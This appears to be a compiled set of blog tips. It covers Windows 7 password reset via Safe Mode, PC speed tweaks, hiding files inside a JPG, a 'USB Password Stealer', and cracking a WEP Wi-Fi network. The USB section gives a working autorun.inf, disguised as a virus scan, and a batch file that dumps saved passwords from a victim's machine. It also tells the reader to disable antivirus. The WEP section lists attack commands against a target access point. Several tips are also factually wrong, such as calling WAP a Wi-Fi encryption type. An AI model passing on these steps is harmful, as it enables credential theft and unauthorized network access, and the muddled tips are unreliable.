Option 1: Unlock Windows 7 password with password reset disk

Option 2: Unlock Windows 7 password from safe mode

Windows 7 system has a built-in administrator account that is created during Windows installation, and disable by default, which has no password in it. You need to enable that account before forgetting your other admin account password. Otherwise your built-in administrator account won’t appear in the screen in this tip.

1. Start your win 7 computer and press “F8″ while the computer boots up. Scroll down to “Safe Mode with Command Prompt” with the arrow keys on the keyboard and press “Enter.” Your computer starts in Safe Mode with Command Prompt.

2. Select the Administrator account that appear in the screen, then enter command prompt. Type: net user ****** 123456 and enter (****** is the account name which password you need to reset 123456 is the new password), it will show you a message that” the command completed successfully.

3. Restart your win 7 computer, then you can log in as ****** with the password 123456. You can go to control Panel to change your account password if necessary.

10 Ways To Optimize Your PC Speed

Top Ten Tips To Improve System Speed/Optimize System Speed

1) Let your PC boot up completely before opening any applications.

2) Refresh the desktop after closing any program. This will remove any unused files from the ram. 

3) Do not set a very large size of image as your wallpaper. I recommend do not keep a wallpaper if your system specifications are low or it runs slowly.

4) Do not clutter your desktop with a lot of shortcuts. Each shortcut on the desktop uses about 500 bytes of RAM.

5) Clean up/empty the recycle bin regularly. The files you deleted from hard drive are not actually yet deleted until you delete them from recycle bin.  

6)Make sure you delete internet temporary files regularly, as it can slow down your PC. I suggest use cleaner software like PC Cleaner Pro.

7) Defragment your hard once every two months. This will free up a lot of space and rearrange the files on your hard drive so that your applications run faster than usual. 

8) Always create two partitions in your hard drive. Install large file size of softwares(like PSP, 3Ds Max, Photoshop, Games) in secondary partitions not in OS installed partition. Windows uses all the available empty space in C drive as a Virtual Memory when your computer RAM is full. Keep the Drive C as empty as possible. 

9)When installing new softwares, disable the option of having a tray icon . The tray icoon uses available RAM, and also slow down the booting speed of your PC. Also disable the option of starting the application/program automatically when the PC boots up. You can disable these options later also from the tools preference or options menu in your program. 

10) Protect your PC from DUST. Dust causes the CPU Cooling Fan to jam and slow down thereby gradually heating up your CPU/Processor and thus effects the processing speed. Use compressed air to blow out any dust from CPU. NEVER USE VACUUM !

 Remember ! 

                        RAM IS THE WORKING AREA (DESKTOP) OF THE CPU. KEEP IT AS EMPTY AND CLUTTERED AS POSSIBLE.

Hiding Important Data Behind Images~ Learn Now

Steganography is the art and science of hiding messages, Images, Data etc. in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data- security through obscurity. By using this small and neat trick you can hide whatever data you want behind any image of your choice without reducing its quality, In the following tutorial I will show you how you can hide data behind images without using any exotic software.(Good old Winrar or Winzip is sufficient)

1. Create a folder in your C drive and name it as "hide"(Using Root Directory will make this a bit easier).

2.Now you can put anything and everything you want to hide in this folder. Text files,images,executables (ANYTHING).Also, put the image behind which you want to hide the files in the same directory, say "image.jpg".

3.After putting everything you want to hide in the "hide" folder, Right click on it, and click "Add to Hide.rar" or "Add to archive". Our goal is to create a .rar file of the "Hide" folder.
Now you should see the "hide.rar"created in the same directory along with the folder.

4. Now we need to open up command prompt and change the working root directory to your current directory and type the following commands.(First change directory then create the output file).(Remember "C" is capital in "C:\\")

►cd C:\\
►Copy /b image.jpg + hide.rar output.jpg

Here "image.jpg" is the image behind which you want to hide the rar file.
"hide.rar" is the file containing the files to be hidden.
"output.jpg" is the output file that we want. It contains the hidden files, but looks like an image

After executing the following command, we will see an extra image called "output.jpg" created in the same directory.(Note that it's size is size of image.jpg +size of hide.rar)

Now you can delete all the files except "output.jpg". If you double click the file, it opens a normal image. But you can see the hidden files by opening the file with winrar.(Right Click->Open With->Choose WinRar.)

That's It! Now you can send this image to anyone, what others will see is just a regular image but if the recipient knows, s/he will be able to access any secret information privately.This tutorial can be used for any type of files like mp3,wmv,txt etc. since anything can be put into a Rar file.
Although you may want to keep the files to be hidden as small as possible since it wouldn't be very subtle if you try hiding a 15 Gb setup file for the game 'Crysis 3' behind a 5Kb smiley picture.

USB Password Stealer

There's a lot of people in the world and even more online accounts. Every security system has a flaw and what we're going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare just tick "Remember Me" on various websites without a second thought thinking it's going to save their time. This is particularly common among poeple who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password. Not knowing that there exist many tools to "recover" saved passwords (More like- to exploit exactly these naive people). Browsers store passwords and account details in cookies. What's quite surprising is just how little security they offer, even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to "Show Saved Paswords" in the options menu. We're going to cut even that out, just plug in a USB- Take it out- and Voila! we have all the passwords. That is what you'll learn in this tutorial. So, with a goal in mind and not a second to spare, let's start right away.

MessenPass - MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.




Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc




IE Passview - IE passview is another small program that helps us view stored passwords in Internet explorer.




Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.




Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I've tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/)




So that's that and now we are ready to create a USB password stealer.

Note: These programs tend to attract a lot of attention from antivirus softwares (Get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course ;-)




1. First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen drive. Make sure you have all the installation files in your USB[if any])




2. Create a new Notepad and write the following text into it:










[autorun]

open=launch.bat

ACTION= Perform a Virus Scan




Save the Notepad and rename it from New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.




3. Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.)

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt




Save the Notepad and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.




These were simple commands to start up our password "recovering" programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files.




Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it's magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work.

See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious.

This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.

Wireless B and G (and some N) routers operate at the 2.4GHz frequency, which only has three non-overlapping channels: 1, 6 and 11. By default, your router will most likely be using one of these channels, and the bad news is so your neighbors' routers as well. If you experience dropped connections, sluggish performance or both, a good first step is to switch the channel. If it's set to channel 1, go to 11. If it's set to 6, try either 1 or 11 for best results.

Hack A Wireless Network/Wifi/WEP !

HOW TO HACK A WIFI NETWORK =>

So.. Here’s how we do it..

1) First we need to scan for available wireless networks.Theres this great tool for windows to do this.. called “NetStumbler” or Kismet for Windows and Linux and KisMac for Mac It’ll also show how the Wi-fi network is secured..

The two most common encryption types are:
1. WEP
2. WAP

WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP
i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP
key easily.. whereas WAP is currently the most secure and best option to secure a wi-fi network..
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

Here I’ll tell you how to Crack WEP

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP. BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on
Backtrack are:
Kismet – a wireless network detector
airodump – captures packets from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys
1. First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It
may ask you for the appropriate adapter which in my case is ath0. You can see your device’s
name by typing in the command iwconfig.
2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in
monitor mode.
3. In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In
our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN
0=OTHER(usually WAP).
4. Once you find an access point, open a text document and paste in the networks broadcast
name (essid), its mac address (bssid) and its channel number.
To get the above information,
use the arrow keys to select an access point and hit <ENTER> to get more information about it.
5. The next step is to start collecting data from the access point with airodump. Open up a
new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w
[filename] –bssid [bssid]
[device]
In the above command airodump-ng starts the program , the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes
after –bssid. The command ends with the device name. Make sure to leave out the brackets.
6. Leave the above running and open another terminal. Next we will generate some fake packets
to the target access point so that the speed of the data output will
increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h
00:11:22:33:44:55:66 -e [essid]
[device]
In the above command we are using the airplay-ng program. The -1 tells the program the
specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.
7. Now, we will force the target access point to send out a huge amount of packets that we will
be able to take advantage of by using them to attempt to crack the WEP key. Once the following
command is executed, check your airodump-ng terminal and you should see the ARP packet
count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h
00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is
packet injection, -b is the MAC address of the target access point , -h is your wireless
adapters MAC address, and the wireless adapter device name goes at the end.
8. Once you have collected around 50k-500k packets, you may begin the attempt to break
the WEP key. The command  begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128
[filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC
address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then
leave it out. This should crack the WEP key within seconds. The more packets you capture, the
bigger chance you have of cracking the WEP key.

Important Note for our Readers - Despite receiving security updates for Windows XP by using such tricks, it is not possible to secure the complete system appropriately. So we highly recommend all of you to upgrade your operating system to the latest versions, i.e. Windows 7 or 8 or any Linux Distro.
